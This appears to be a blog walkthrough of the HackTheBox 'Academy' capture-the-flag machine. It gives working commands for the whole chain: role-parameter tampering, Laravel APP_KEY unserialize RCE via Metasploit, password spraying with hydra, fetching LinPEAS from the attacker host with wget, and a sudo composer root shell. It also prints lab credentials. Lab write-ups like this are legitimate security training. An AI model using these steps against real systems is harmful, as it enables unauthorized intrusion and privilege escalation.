Today we are going to crack a machine called Academy. It was created by egre55 & mrb3n. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
·
Network Scanning
o
Nmap Scan
·
Enumeration
o
Enumerating Virtual hosts
o
Browsing HTTP Service in
Browser
o
Registering into Application
o
Exploiting Parameter Tampering
for Administrator Access
o
Directory Bruteforce using dirb
o
Enumerating Admin pages
o
Enumerating Virtual Host
o
Enumerating Laravel PHP
Framework
o
Extracting APP_KEY
o
Searching for exploit on
Searchsploit
·
Exploitation
o
Exploiting Unserialize RCE
using Metasploit
o
Enumerating DB Password
o
Reading /etc/passwd file
o
Password Spraying using Hydra
o
Logging in as cry0l1t3
o
Reading User Flag
·
Privilege Escalation
o
Uploading and Executing LinPEAS
o
Enumerating Logs for
credentials of mrb3n user
o
Logging in as mrb3n user
o
Enumerating Sudo permissions
o
Exploiting Sudo Permissions on
composer
o
Getting Root Shell
o
Reading the Root Flag
Walkthrough
Network Scanning
To Attack any machine, we need the IP
Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.106.234
Now that we have the IP Address. We need to
enumerate open ports on the machine. For this, we will be running a nmap scan.
nmap -p- -sC -sV 10.129.106.234
Enumeration
From the nmap scan of the port 80, we can
see that it is trying to redirect to http://academy.htb/ So let’s add this link
into our etc/hosts file.
nano /etc/hosts
10.129.106.234 academy.htb
Since we have added the host, we can now
see the website into the browser. It is the clone of HTB Academy Website.
http://academy.htb
Among the broken links there was a
register.php page. We tried to register on the application. It is always a good
practice to use Burp To inspect the requests being sent to the server to
understand the working of the application.
http://academy.htb/register.php
We found that apart from the username, password there is a parameter of roleid that is traveling as well to the roiled server. It has the value of 0 by default.
We tried changing
the value to 1 to see if we get some additional access on the application
The basic application
remains the same as shown below.
We performed a
directory Bruteforce in order to detect any high privilege pages or some
sensitive pages with information. This led us to the admin.php page.
dirb http://academy.htb
http://academy.htb/admin.php
We open the detected page and we found a
hostname "dev-staging-01.academy.htb".
http://academy.htb/admin-page.php
We add this
hostname in our /etc/hosts file corresponding to the IP address as before.
nano /etc/hosts
10.129.106.234 academy.htb
dev-staging-01.academy.htb
Now we try to browse the
dev-staging-01.academy.htb to find that it is reverting an Internal Server
Error. There are some paths visible that suggest that Laravel is working behind
the scenes. Also, we try to enumerate the browser console to find the
Environment Variables. IT states that App_name is indeed Laravel and there is a
base64 encoded key here. It also contains a ton of other information.
http://dev-staging-01.academy.htb
Laravel
APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
Since we know the Laravel Framework is at
works, we decided to search for it in the Searchsploit. We found a Unserialize
Command Execution.
searchsploit Laravel
Exploitation
As it is present inside the Metasploit, we
use it from there. Here it requires the IP Address of the Target Machine, IP
Address of the Attacker Machine, The Base64 APP key we found earlier, the Virtual
Host that is running Laravel. After providing all the data, we execute the
payload.
use
exploit/unix/http/laravel_token_unserialize_exec
set rhosts 10.129.106.234
set lhost 10.10.14.80
set APP_KEY
dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set vhost dev-staging-01.academy.htb
exploit
python3 -c 'import pty;pty.spawn("bash")'
Through the RCE, we get ourselves a shell.
We converted it into a TTY shell using a python one liner. The shell we got is
for the user www-data. We started our enumeration of the machine in order to
find a way to elevate privilege. This led us to the academy directory in the
/var/www/html folder. Here we found a hidden directory by the name of .env. We
read the .env file to find the DB Credentials of MySQL
cd /var/www/html/
cd academy
cat .env
DB_PASSWORD=mySup3rP4s5w0rd!!
We read the /etc/passwd file to collect the
users for the SSH login.
cat /etc/passwd
We took the usernames found and created a
dictionary by the name of user.txt and we took the DB password that we found
and pasted it into a text file by the name of pass.txt. Now we will perform
Password Spraying on all the users to see if anyone user has the same password
for the ssh login. We will do this using hydra tool. Hydra told us that the
user cry0l1t3 has the password that we were looking for.
hydra -L user.txt -P pass.txt
10.129.106.234 ssh
cry0l1t3
mySup3rP4s5w0rd!!
We logged in through ssh for user cry0l1t3.
Again, we convert the shell into a TTY shell and then looked for the user flag.
ssh cry0l1t3@10.129.106.234
mySup3rP4s5w0rd!!
python3 -c 'import pty;pty.spawn("bash")'
cd /home/cry0l1t3
cat user.txt
Privilege Escalation
Now in order to elevate privilege on the
Target machine, we will use LinPEAS post exploitation script to enumerate the
machine. We already have the script on our local machine, we hosted it on port
8000 and then downloaded it to the target machine using wget inside the /tmp
directory. Now we provide it with the appropriate permissions for execution and
then LinPEAS.
wget 10.10.14.80:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
LinPEAS extracted the credentials for the
mrb3n user inside the audit logs.
sh "su mrb3n",<nl>
su "mrb3n_Ac@d3my!",<nl>
We use these credentials to login as mrb3n
user. Then we convert the shell into a TTY shell and enumerated for sudo
permissions. We found that we can execute composer with elevated privileges. We
are in luck as composer is one of the binaries that are mentioned in the
GTFOBins. From there we got the method to get root shell. Upon following those
methods, we get root on the target machine. We read the root flag to conclude
the machine.
mrb3n
mrb3n_Ac@d3my!
python3 -c 'import
pty;pty.spawn("bash")'
sudo -l
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh
-i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF
run-script x
id
cd /root
cat root.txt
0 comments:
Post a Comment